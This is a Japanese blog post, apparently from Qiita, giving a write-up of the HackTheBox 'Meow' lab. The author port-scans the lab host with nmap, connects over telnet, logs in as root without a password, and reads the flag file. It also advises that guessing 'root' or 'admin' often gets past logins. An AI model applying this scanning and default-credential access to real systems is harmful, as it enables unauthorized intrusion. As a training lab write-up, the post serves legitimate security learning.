LoginSignup
0
0

More than 1 year has passed since last update.

@GuriTech(GuriTech)

HackTheBox Writeup: Meow

Last updated at Posted at 2022-09-13

概要

HackTheBox:Meowのflagを入手する手順を記す。

Port Scan

Nmapでスキャンをかける。

$ nmap -v -oN ports meow.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 10:55 EDT
Initiating Ping Scan at 10:55
Scanning meow.htb (10.129.213.24) [2 ports]
Completed Ping Scan at 10:55, 0.25s elapsed (1 total hosts)
Initiating Connect Scan at 10:55
Scanning meow.htb (10.129.213.24) [1000 ports]
Discovered open port 23/tcp on 10.129.213.24
Increasing send delay for 10.129.213.24 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 10:55, 41.76s elapsed (1000 total ports)
Nmap scan report for meow.htb (10.129.213.24)
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
23/tcp   open     telnet
9876/tcp filtered sd

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 42.07 seconds

telnetが提供されていることが分かる。

Telnet

Telnetに接続する。

$ telnet meow.htb   
Trying 10.129.213.24...
Connected to meow.htb.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login:

入力を求められるので、とりあえずrootと入力する。
(rootとかadminをとりあえずで入力すると突破できる場面が多々ある)

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 13 Sep 2022 02:59:37 PM UTC

  System load:           0.08
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             137
  Users logged in:       0
  IPv4 address for eth0: 10.129.213.24
  IPv6 address for eth0: dead:beef::250:56ff:fe96:4b83

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt

無事ログインできたのでflag.txtを読み取り終了。

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0